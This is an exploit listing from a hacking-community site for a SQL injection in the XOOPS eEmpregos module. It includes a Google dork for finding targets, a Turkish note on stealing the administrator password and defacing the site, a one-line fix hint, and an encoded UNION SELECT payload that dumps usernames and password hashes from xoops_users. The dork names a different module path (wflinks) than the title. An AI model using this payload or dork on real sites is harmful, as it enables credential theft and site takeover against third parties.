XOOPS Module eEmpregos ~ SQL Inj. | Cyber-Warrior Information Technology's World

Root > Exploits / Vulnerabilities > XOOPS Module eEmpregos ~ SQL Inj.

Madde
	Author : Bug Researchers
	Date : 20.10.2008 00:09:31
	# XOOPS Module eEmpregos ~ SQL Inj. [Full Screen Display]

	< ------------------- header data start ------------------- > ############################################################# # Application Name : XOOPS Module eEmpregos # Vulnerable Type : SQL Injection # Google Keyword : allinurl: modules/wflinks/viewcat.php # Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir. # Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir. Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id)) # author : Bug Researchers ############################################################# < ------------------- header data end of ------------------- > < -- bug code start -- > -00000000%2F%2A%2A%2Funion%2F%2A%2A%2Fselect+0,1,concat(uname,0x3a,pass)/*/from%2F%2A%2A%2Fxoops_users//*where%20admin%201=%202 < -- bug code end of -- >